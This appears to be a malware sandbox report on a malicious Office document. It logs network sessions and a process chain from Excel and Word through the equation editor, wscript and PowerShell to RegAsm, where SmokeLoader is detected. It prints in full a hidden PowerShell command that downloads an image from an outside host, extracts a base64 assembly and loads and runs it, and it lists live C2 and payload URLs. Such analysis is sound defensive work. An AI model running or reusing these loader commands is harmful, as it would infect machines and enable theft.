                                                      Aug 31, 2024 15:51:45.412718058 CEST | 1236 | IN | Data Raw: 22 64 c2 b3 8e d1 96 69 6f da d8 11 e6 1b d4 e5 7a 74 48 ec 08 2a e9 cd 0c 7b b5 58 b4 8f 13 bb 67 d8 d1 b9 1a 51 6c 46 fe e3 7d e4 1d 37 e6 75 5c 03 96 01 ae 43 a2 02 37 3a 0c bb 2c 23 f6 16 c7 34 0b 51 a1 b0 42 47 f6 c4 67 8a ab d3 20 36 0f b2
                                                      Data Ascii: "dioztH*{XgQlF}7u\C7:,#4QBGg 6!D6w\)85/QN|wn2+w0/86Su9"M.k$qW[PNkW,RPj+\mT~/^\U&gB,5<z#{
                                                      Aug 31, 2024 15:51:45.412729025 CEST | 672 | IN | Data Raw: 2c 06 25 d8 06 da cf 30 f2 f7 8c 37 90 3f e2 de 0d 62 d2 0f 0f f4 7b 4b 6b 0e 27 42 d6 53 86 5c e6 6b 56 9a 09 1a b2 a6 c7 d2 23 76 42 63 9d f6 9b 07 14 29 a7 e1 78 c2 42 36 6a 58 0a 60 23 51 bf 62 27 01 e7 c5 7d 19 05 9d be 9b b5 07 54 be 5e 5e
                                                      Data Ascii: ,%07?b{Kk'BS\kV#vBc)xB6jX`#Qb'}T^^bn}vfau)Nr)<h/Dgq`?|lD~c^%u=6N!\}K14KH;z<d#C^n+~UdH+J8SSo_g+>yS^5%#
                                                      Aug 31, 2024 15:51:45.412739038 CEST | 1236 | IN | Data Raw: b8 16 44 62 0c af 09 64 da d6 0c f6 b7 c6 ee 3c 8c 4e 3b 7d 63 48 cd 9f a8 81 49 c4 f0 33 8d 7d cf 2c 5b cc e7 0f ca 1e e8 c4 e9 3e bc 71 a2 e1 e9 cb 5d d2 53 14 7a 32 14 da c0 5b c7 b9 9f 02 32 8d 22 eb df 96 ca e7 65 55 4c ac c3 cd 45 e4 f8 b8
                                                      Data Ascii: Dbd<N;}cHI3},[>q]Sz2[2"eULE{)S\fL5Lyc5|WP%s$zGbi*Uk$K1>9lH*j]hf?(9ZH&TO!.^>2<RKz
                                                      Aug 31, 2024 15:51:45.412750006 CEST | 1236 | IN | Data Raw: c6 13 f3 bc d2 ac 4b 10 a6 e7 01 de 43 2b 85 af 1d c9 3c 79 6d 6d bd 91 d0 a7 43 78 00 e7 95 1c 3e c4 b0 73 48 1e cb 95 ad 06 fa 0e d0 ce 58 e7 90 6f d5 86 12 6d fc 53 13 a8 c1 0a 8a af 89 df 66 25 35 10 34 1c 6d 7b 67 78 d5 80 d4 cd a3 f4 c9 4b
                                                      Data Ascii: KC+<ymmCx>sHXomSf%54m{gxKi.h_TKdFLN0xCln@'Hq^o)h/dP,k}4K:VmBJ:Im;#OON {QK>:J*mD9Jwx23gk>7)$*YqPVp
                                                      Aug 31, 2024 15:51:45.412760019 CEST | 1236 | IN | Data Raw: 03 89 76 6d 5d f9 fc 08 bd 71 1f 36 fa 40 a9 33 9a 5c c6 cd ac cc d2 e0 69 40 06 9e 0c f7 59 ac ff fc 9d 67 e2 b2 e0 e9 a8 9c bc 3e a7 ca e8 34 81 1a 91 ad a0 f5 38 b8 7c 5b 42 82 cf 5c f8 f3 8a 04 61 3a 4d dd dd 2d 80 40 2b 22 ee 6b 6f 17 fa dd
                                                      Data Ascii: vm]q6@3\i@Yg>48|[B\a:M-@+"ko?eQ]*6-T"VblxV~{y/O/$@K+3i{5js&EfUF=vDN%n2 RC8GYNe?hj$T"sScd
                                                      Aug 31, 2024 15:51:45.412770987 CEST | 672 | IN | Data Raw: 09 22 53 4e 4d 1d 0f c0 f1 7d 38 db 7b ef 82 ba bc 88 de 65 15 ce 1d 94 a0 51 c8 16 fa 66 fa 6f 72 7f fc 7f 07 67 58 da 9d ed fa d3 f0 91 09 6a a6 96 79 ab d8 ea fc d0 6c 2a ce b7 f0 59 51 2b f2 52 dc c2 91 56 73 13 17 ac 6a 0c 48 df f3 c5 67 94
                                                      Data Ascii: "SNM}8{eQforgXjyl*YQ+RVsjHg0a)avPlild?6\|z!7bySpm*@|>5j<~M@Gl37Mai,EW8'xgKP+j<]Cqrh]AQh
                                                      Aug 31, 2024 15:51:45.412967920 CEST | 1236 | IN | Data Raw: f1 78 8e 29 7a 06 23 09 86 8f 6a c2 fa ab 2d 64 86 eb 24 dc 68 a0 b2 a8 55 d6 a7 65 ec e6 e3 ee 07 d2 07 10 34 55 34 aa 47 ab 58 e7 20 28 37 95 40 a5 b4 ba b4 1e fa 32 24 a6 1a fd e6 2e 44 02 5e a1 44 65 e0 f2 ab fe cd 8c e9 74 69 7b fc b8 ff 6a
                                                      Data Ascii: x)z#j-d$hUe4U4GX (7@2$.D^Deti{j\p%M;*^ kn?'CxKO@|7P@RS?JUet+XC?,c@<g7ks_'_bh.6^`u7x*H_Ul
                                                      Aug 31, 2024 15:51:45.412980080 CEST | 1236 | IN | Data Raw: 09 e2 cb 0f 81 57 6d 67 5e d0 d4 95 49 5a 1c 02 ba 6c 4a ae c0 1a 7c c0 94 9b 9d 2e fe 17 02 29 28 46 57 39 ec 7b b9 da 55 2c f5 4f 31 88 a6 cc c5 4e e8 6d 4f 7e 19 c8 60 3f 6d 35 16 c6 f0 e2 e0 05 00 f0 f7 c9 5b f5 eb 55 64 58 ae df 99 6c e3 c5
                                                      Data Ascii: Wmg^IZlJ|.)(FW9{U,O1NmO~`?m5[UdXlc,7^UEr<l]_4-hP)"504o:`3X<`9xa-dW%hJm#{YSFf-b]Q?D\rMc\k&dbs7MLc>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      5 | 192.168.2.22 | 49174 | 185.251.91.119 | 80 | 2852 | C:\Windows\SysWOW64\explorer.exe
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      Aug 31, 2024 15:51:49.478857994 CEST | 274 | OUT | POST /index.php HTTP/1.1
                                                      Connection: Keep-Alive
                                                      Content-Type: application/x-www-form-urlencoded
                                                      Accept: */*
                                                      Referer: http://prolinice.ga/
                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                      Content-Length: 1395
                                                      Host: prolinice.ga
                                                      Aug 31, 2024 15:51:49.478885889 CEST | 1395 | OUT | Data Raw: 6e e2 97 fb c0 4d f4 65 6e 17 bf 60 4f 5e f9 8e d8 51 ec 5b 45 88 c9 9f f2 e1 7d 18 dc 4d 40 05 40 b1 ea b8 0a df 82 a5 67 be c4 b0 d5 ee 65 75 c5 67 5d 48 8c 38 2e e3 36 d6 88 68 45 d7 76 e0 a7 9a bd 52 eb cc 59 3b 1f d6 b2 50 4c 85 5d 82 f8 a2
                                                      Data Ascii: nMen`O^Q[E}M@@geug]H8.6hEvRY;PL]Oc~k_!z1rJC\S7Wx*>x :xGresn*q~TF&u#RCIP6=I.:ua)i1b|Fz1~_"
                                                      Aug 31, 2024 15:51:50.536051035 CEST | 565 | IN | HTTP/1.1 404 Not Found
                                                      date: Sat, 31 Aug 2024 13:51:50 GMT
                                                      server: Apache/2.4.59 (Debian)
                                                      content-length: 409
                                                      content-type: text/html; charset=utf-8
                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f [TRUNCATED]
                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      0 | 192.168.2.22 | 49161 | 208.64.171.230 | 443 | 3416 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:50:57 UTC | 321 | OUT | GET /udMVqm HTTP/1.1
                                                      Accept: */*
                                                      UA-CPU: AMD64
                                                      Accept-Encoding: gzip, deflate
                                                      User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                      Host: crash.sh
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:50:58 UTC | 563 | IN | HTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:50:58 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 0
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept
                                                      2024-08-31 13:50:58 UTC | 200 | IN | Data Raw: 46 6f 75 6e 64 2e 20 52 65 64 69 72 65 63 74 69 6e 67 20 74 6f 20 68 74 74 70 3a 2f 2f 32 33 2e 39 34 2e 31 34 38 2e 31 36 2f 39 30 2f 67 6e 2f 69 6e 65 74 6d 65 63 61 6e 67 65 74 62 61 63 6b 77 69 74 68 65 6e 74 69 72 65 74 68 69 6e 67 73 74 6f 62 65 66 69 6e 65 77 69 74 68 6d 65 73 68 65 69 73 6e 69 63 65 67 69 72 6c 77 68 6f 6c 6f 76 65 74 6f 64 72 69 76 65 74 68 65 6d 61 67 69 63 6f 66 6e 69 63 65 70 65 72 73 6f 6e 77 69 74 68 6d 65 67 72 65 61 74 74 68 69 6e 67 73 68 61 70 70 65 6e 69 6e 67 77 69 74 68 5f 5f 5f 5f 5f 5f 5f 5f 5f 67 6f 6f 64 67 69 72 6c 67 72 65 61 74 64 61 79 2e 64 6f 63
                                                      Data Ascii: Found. Redirecting to http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      1 | 192.168.2.22 | 49163 | 208.64.171.230 | 443 | 3692 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:50:59 UTC | 130 | OUT | OPTIONS / HTTP/1.1
                                                      User-Agent: Microsoft Office Protocol Discovery
                                                      Host: crash.sh
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:51:00 UTC | 423 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:50:59 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 8
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Allow: GET,HEAD
                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                      2024-08-31 13:51:00 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                      Data Ascii: GET,HEAD


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      2 | 192.168.2.22 | 49164 | 208.64.171.230 | 443 | 3692 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:51:01 UTC | 115 | OUT | HEAD /udMVqm HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: crash.sh
                                                      2024-08-31 13:51:01 UTC | 575 | IN | HTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:01 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      3 | 192.168.2.22 | 49165 | 208.64.171.230 | 443
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:51:07 UTC | 125 | OUT | OPTIONS / HTTP/1.1
                                                      Connection: Keep-Alive
                                                      User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                                                      translate: f
                                                      Host: crash.sh
                                                      2024-08-31 13:51:10 UTC | 423 | IN | HTTP/1.1 200 OK
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:08 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 8
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Allow: GET,HEAD
                                                      ETag: W/"8-ZRAf8oNBS3Bjb/SU2GYZCmbtmXg"
                                                      2024-08-31 13:51:10 UTC | 8 | IN | Data Raw: 47 45 54 2c 48 45 41 44
                                                      Data Ascii: GET,HEAD


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      4 | 192.168.2.22 | 49166 | 208.64.171.230 | 443
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:51:11 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 72 61 73 68 2e 73 68 0d 0a 0d 0a
                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: crash.sh
                                                      2024-08-31 13:51:11 UTC | 419 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:11 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 144
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Content-Security-Policy: default-src 'none'
                                                      2024-08-31 13:51:11 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                      5 | 192.168.2.22 | 49167 | 208.64.171.230 | 443
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:51:11 UTC | 155 | OUT | Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 36 2e 31 2e 37 36 30 31 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 63 72 61 73 68 2e 73 68 0d 0a 0d 0a
                                                      Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601Depth: 0translate: fContent-Length: 0Host: crash.sh
                                                      2024-08-31 13:51:12 UTC | 419 | IN | HTTP/1.1 404 Not Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:12 GMT
                                                      Content-Type: text/html; charset=utf-8
                                                      Content-Length: 144
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Content-Security-Policy: default-src 'none'
                                                      2024-08-31 13:51:12 UTC | 144 | IN | Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 50 52 4f 50 46 49 4e 44 20 2f 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                      Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot PROPFIND /</pre></body></html>


                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                      6 | 192.168.2.22 | 49168 | 208.64.171.230 | 443 | 3692 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Timestamp | Bytes transferred | Direction | Data
                                                      2024-08-31 13:51:12 UTC | 134 | OUT | HEAD /udMVqm HTTP/1.1
                                                      User-Agent: Microsoft Office Existence Discovery
                                                      Host: crash.sh
                                                      Content-Length: 0
                                                      Connection: Keep-Alive
                                                      2024-08-31 13:51:12 UTC | 575 | IN | HTTP/1.1 302 Found
                                                      Server: nginx
                                                      Date: Sat, 31 Aug 2024 13:51:12 GMT
                                                      Content-Type: text/plain; charset=utf-8
                                                      Content-Length: 200
                                                      Connection: close
                                                      X-DNS-Prefetch-Control: off
                                                      X-Frame-Options: SAMEORIGIN
                                                      Strict-Transport-Security: max-age=15552000; includeSubDomains
                                                      X-Download-Options: noopen
                                                      X-Content-Type-Options: nosniff
                                                      X-XSS-Protection: 1; mode=block
                                                      Location: http://23.94.148.16/90/gn/inetmecangetbackwithentirethingstobefinewithmesheisnicegirlwholovetodrivethemagicofnicepersonwithmegreatthingshappeningwith_________goodgirlgreatday.doc
                                                      Vary: Accept


                                                      Session ID:7
                                                      Source IP:192.168.2.22
                                                      Source Port:49171
                                                      Destination IP:207.241.232.154
                                                      Destination Port:443
                                                      PID:2892
                                                      Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Timestamp:2024-08-31 13:51:19 UTC
                                                      Bytes transferred:111
                                                      Direction:OUT
                                                      Data:GET /27/items/vbs_20240726_20240726/vbs.jpg HTTP/1.1
                                                      Host: ia803104.us.archive.org
                                                      Connection: Keep-Alive
                                                      Timestamp:2024-08-31 13:51:19 UTC
                                                      Bytes transferred:591
                                                      Direction:IN
                                                      Data:HTTP/1.1 200 OK
                                                      Server: nginx/1.24.0 (Ubuntu)
                                                      Date: Sat, 31 Aug 2024 13:51:19 GMT
                                                      Content-Type: image/jpeg
                                                      Content-Length: 1931225
                                                      Last-Modified: Fri, 26 Jul 2024 21:52:52 GMT
                                                      Connection: close
                                                      ETag: "66a41ab4-1d77d9"
                                                      Strict-Transport-Security: max-age=15724800
                                                      Expires: Sat, 31 Aug 2024 19:51:19 GMT
                                                      Cache-Control: max-age=21600
                                                      Access-Control-Allow-Origin: *
                                                      Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                      Access-Control-Allow-Credentials: true
                                                      Accept-Ranges: bytes


                                                      Target ID:0
                                                      Start time:09:50:34
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                      Imagebase:0x13faa0000
                                                      File size:28'253'536 bytes
                                                      MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:4
                                                      Start time:09:50:57
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                      Wow64 process (32bit):false
                                                      Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding
                                                      Imagebase:0x13f2c0000
                                                      File size:1'423'704 bytes
                                                      MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:false

                                                      Target ID:9
                                                      Start time:09:51:12
                                                      Start date:31/08/2024
                                                      Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                      Imagebase:0x400000
                                                      File size:543'304 bytes
                                                      MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:10
                                                      Start time:09:51:13
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\wscript.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verynicebuttersmoothcakeicream.vBs"
                                                      Imagebase:0x5f0000
                                                      File size:141'824 bytes
                                                      MD5 hash:979D74799EA6C8B8167869A68DF5204A
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:11
                                                      Start time:09:51:13
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '[obfuscated base64 payload omitted]';$OWjuxD = [system.Text.encoding]::Unicode.GetString( [system.Convert]::Frombase64String( $Codigo.replace('? ? ? ? ?','A') ) );powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                      Imagebase:0xf0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:13
                                                      Start time:09:51:15
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "$imageUrl = 'https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg';$webClient = New-Object System.Net.WebClient;$imageBytes = $webClient.DownloadData($imageUrl);$imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes);$startFlag = '<<BASE64_START>>';$endFlag = '<<BASE64_END>>';$startIndex = $imageText.IndexOf($startFlag);$endIndex = $imageText.IndexOf($endFlag);$startIndex -ge 0 -and $endIndex -gt $startIndex;$startIndex += $startFlag.Length;$base64Length = $endIndex - $startIndex;$base64Command = $imageText.Substring($startIndex, $base64Length);$commandBytes = [System.Convert]::FromBase64String($base64Command);$loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes);$type = $loadedAssembly.GetType('dnlib.IO.Home');$method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.VFEW/09/61.841.49.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm',''))"
                                                      Imagebase:0xf0000
                                                      File size:427'008 bytes
                                                      MD5 hash:EB32C070E658937AA9FA9F3AE629B2B8
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:14
                                                      Start time:09:51:20
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                                      Wow64 process (32bit):true
                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                                      Imagebase:0x13c0000
                                                      File size:64'704 bytes
                                                      MD5 hash:8FE9545E9F72E460723F484C304314AD
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.465506126.0000000000131000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                      • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                      • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 0000000E.00000002.465492462.0000000000110000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                      Reputation:high
                                                      Has exited:true

                                                      Target ID:15
                                                      Start time:09:51:26
                                                      Start date:31/08/2024
                                                      Path:C:\Windows\explorer.exe
                                                      Wow64 process (32bit):false
                                                      Commandline:C:\Windows\Explorer.EXE
                                                      Imagebase:0xff2f0000
                                                      File size:3'229'696 bytes
                                                      MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                      Has elevated privileges:true
                                                      Has administrator privileges:true
                                                      Programmed in:C, C++ or other language
                                                      Yara matches:
